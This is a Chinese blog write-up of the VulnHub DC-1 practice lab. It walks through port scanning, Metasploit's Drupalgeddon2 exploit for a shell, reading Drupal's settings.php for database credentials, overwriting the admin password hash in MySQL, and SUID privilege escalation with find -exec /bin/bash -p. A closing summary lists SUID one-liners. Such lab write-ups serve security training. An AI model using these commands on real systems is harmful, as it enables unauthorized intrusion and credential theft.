漏洞复现 -- DC-1

已于 2024-08-22 16:22:14 修改
阅读量203 收藏 2
点赞数 1
文章标签: 网络安全 安全 python
于 2024-08-22 16:19:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/141431263
版权

靶场地址

https://download.vulnhub.com/dc/DC-1.zip

目标

找到五个flag

漏洞复现

flag1

sudo arp-scan -l
# 主机发现

nmap -p- 192.168.222.137 --min-rate=5000
# 扫描开放端口

http://192.168.222.137:80
# 访问80端口
发现网站的CMS是Drupal 7,这就是典型的MSF渗透

msfconsole
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 192.168.222.137
run

# msf反弹shell

shell
id
whoami

ls -al

cat flag1.txt

根据提示信息,寻找目标站点的配置文件

flag2

通过百度查找,Drupal的默认配置文件在sites/default/settings.php
cat /var/www/sites/default/settings.php
# 查看Drupal默认配置文件

发现了flag2和数据库的账号密码,通过flag2提示我们需要提升权限或者直接爆破来查看敏感文件,

flag3

mysql -u dbuser -p
# 连接数据库

show databases;
use drupaldb
# 选择数据库

show tables
select * from users
# 查看users表

find . -name "*password*"
# 寻找含有password字段的文件名

./scripts/password-hash.sh

意思应该是直接再后面加密码就会返回加密后的结果

./scripts/password-hash.sh 123456
# 查看123456的hash值

show databases;
use drupaldb
update users set pass='$S$DFTjE6MQfJJx3er.iWGVcIIZD8XvaFmGM.F7ZiDbPlxpC./1X/HC'where name="admin";

原来admin的密码编码后为:$S$DFJHHEBzde3wEl35v3Sgr6x2SBA.XYcqcp0/l.PbIlq9fufnT9FS,那么我们就把原来密码替换后为:$S$DFTjE6MQfJJx3er.iWGVcIIZD8XvaFmGM.F7ZiDbPlxpC./1X/HC

http://192.168.222.137:80

账号:admin
密码:123456

flag4

cat /etc/passwd

# /etc/passwd存放了系统中用户账号的基本信息

cd /home/flag4
ls
cat flag4.txt

thefinalflag

给出提示,需要我们进入root用于来查看
cd /root

发现没有权限,直接SUID提权,查看默认以root权限执行的程序

find / -perm -u=s -type f 2>/dev/null
# SUID提权

find / -exec "/bin/bash" -p \;
whoami
# SUID提权

cat thefinalflag.txt

总结

1、SUID提权

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -exec "/bin/bash" -p \;
find . -exec /bin/sh -p \; -quit

冷酷小帅~0x7e
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
simulink仿真-PFC、DC-DC
04-12
在电力电子领域,Simulink被广泛用于设计和仿真各种电源转换系统,如PFC(功率因数校正)和DC-DC转换器。本文将深入探讨标题和描述中涉及的"simulink仿真-PFC、DC-DC"的相关知识点。 首先,我们来看功率因数校正...
AC-DC典型电源电路
03-20
AC-DC典型电源电路
DC-DC内部功耗的计算
08-03
影响开关模式、DC-DC 转换器效率的主要原因
HCIE-DC实验指导.pdf
08-12
实验一:HCIE-DC实验环境准备,其中包括检查设备是否齐全、实际设备组网连线、设备配置清空,通过实验一的操作,帮助熟悉HCIE-DC设备及物理拓扑搭建 实验二:DC二层网络配置实验,通过基本的操作与配置,帮助熟悉...
DC-DC PCB layout 指导.docx
06-18
1. Bad layout 会导致 EMI 干扰,降低 DC-DC 的性能。因此,需要尽量减少 layout 的噪声和干扰。 2. 开关大电流回路尽量短信号地和大电流(功率地)单独走线,并在芯片 GND 处单点连接。这样可以减少噪声和干扰,...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8404
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
AI安全-文生图
深度安全实验室
08-15 450
AI安全-文生图
探索802.1X:构筑安全网络的认证之盾
XINERTEL的博客
08-21 706
首先,让我们了解一下什么是802.1x。802.1x是一个基于端口的网络访问控制机制,由IEEE(电气电子工程师学会)开发,属于IEEE 802.1标准家族。它的主要作用是通过认证管理用户和设备对网络的访问权限。更通俗地说,802.1x就像是网络的门卫,负责检查每一个试图进入网络的设备或用户的身份,只有通过认证的合法用户才能进入。这不仅可以防止未授权的设备接入,还可以确保网络的安全和稳定。
CISAW安全集成和别的类型有什么区别
2402_84109700的博客
08-21 160
对于CISAW安全运维方向,申请人须通过相应的考试,并且满足以下任一条件:具有硕士及以上学位并有2年信息安全相关工作经验,其中至少1年与安全运维相关;其次,CISAW的安全集成方向侧重于评估申请人在信息系统安全集成方面的基础知识和技能的掌握程度,以及运用这些知识分析和解决安全集成问题的能力。- 对于CISAW安全集成方向,申请人同样需要通过相应考试,并满足类似的工作经验要求,但针对的是安全集成领域的专业经验。- 对于CISAW安全管理方向,报名条件与前两者相似,但侧重于风险管理专业方向的相关工作经验。
如何选择较为安全的第三方依赖版本?
极客星云-CSDN博客
08-16 196
本篇博文分享如何选择较为安全的第三方依赖版本的方法。
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 325
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 416
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
网络安全漏洞防护技术原理与应用
weixin_49171105的博客
08-21 333
定义:又称脆弱性,简称漏洞。一般是致使网络信息系统安全策略相冲突的缺陷(安全隐患)影响:机密性受损、完整性破坏、可用性降低、抗抵赖性缺失、可控制性下降、真实性不保等范围:网络信息系统硬件层、软硬协同层、系统层、数据层、应用层、业务层、人机交互层普通漏洞:指相关漏洞信息已广泛公开,安全厂商已有解决修补方案零日漏洞:特指系统或软件中新发现的、尚未提供补丁的漏洞。常被用于实施定向攻击。
建筑楼宇电气安全与能效管理
ACRELKY的博客
08-21 583
这些电气安全事故隐患包括过载、缺相、漏电、三相不平衡、跨接配电线路、零线地线混肴、线路老化、接触不良。楼宇建筑电气安全与能效管理系统与传统的电气监控系统截然不同,是一种基于泛终端的具有互联网功能的排除电气安全事故隐患的技术方案,是管理创新与现代信息技术融合的全新概念,能实现电气监测、控制、运行维护的全过程、自动化、一体化管理,能克服传统电气安全监控系统的缺陷,及时有效地发现和消除“孤岛”管理模式下存在的电气安全事隐患,提高工作效率、降低楼宇建筑配电系统的运行维护成本,具有显著的经济效益和社会效益。
理解安全组与防火墙的关系:云安全的双重保障
weixin_54574094的博客
08-18 664
通过理解它们的关系,并结合使用,您可以构建一个多层次的安全体系,确保您的系统和数据在面对日益复杂的网络威胁时仍然保持安全。您可以创建一个安全组,添加允许80(HTTP)和443(HTTPS)端口的入站规则,并将此安全组关联到您的Web服务器实例。例如,在一个企业的混合云环境中,您可以通过防火墙来保护本地数据中心的安全,同时通过安全组来管理云上实例的访问权限。安全组可以提供灵活、快速的实例级别的安全管理,而防火墙则负责更广泛的网络安全安全组是云计算环境中使用的虚拟防火墙,用于控制实例的入站和出站流量。
API容易被攻击,如何做好API安全
dexunyun的博客
08-20 639
当前,API已成为全球重要 IT 基础设施的基石。由此,了解API安全风险以及采用WAAP解决方案等防护措施等,帮助企业构筑API安全防线,确保API安全,为维护企业安全以及业务的正常运行,确保企业可持续发展有着重要的意义。
银行总分支文件分发系统:在安全与效率之间找到平衡
文件数据安全交换
08-21 556
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。支持自定义人工审批流程,包括多级、多人审批,会签、或签、转签,并支持与OA、BPM审批系统集成,自动邮件通知,确保文件外发安全合规、审批灵活便捷。业务报告:各种业务的月度、季度和年度报告,包括贷款、存款、投资等业务的统计数据;
IP SSL证书的未来趋势:适应不断变化的安全挑战
最新发布
2401_86337938的博客
08-21 589
随着网络攻击手段的不断进化和用户对隐私保护意识的增强,IP SSL证书作为保障网络安全的关键组件之一,也在不断地发展和完善。随着网络安全意识的提高和法规对HTTPS采用的推动,IP SSL证书的应用范围将进一步扩大。为了应对不断升级的安全威胁,IP SSL证书将采用更强大的加密算法,以确保数据传输的安全性。未来的IP SSL证书可能会集成更多的身份验证机制,比如多因素认证(MFA),以增强证书的整体安全性。随着物联网设备数量的激增,IP SSL证书也将需要适应这些设备的安全需求,确保它们之间的通信安全
【第69课】Java安全&JWT攻防&Swagger自动化&算法&签名&密匙&Druid未授权
Lucker_YYY的博客
08-21 645
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值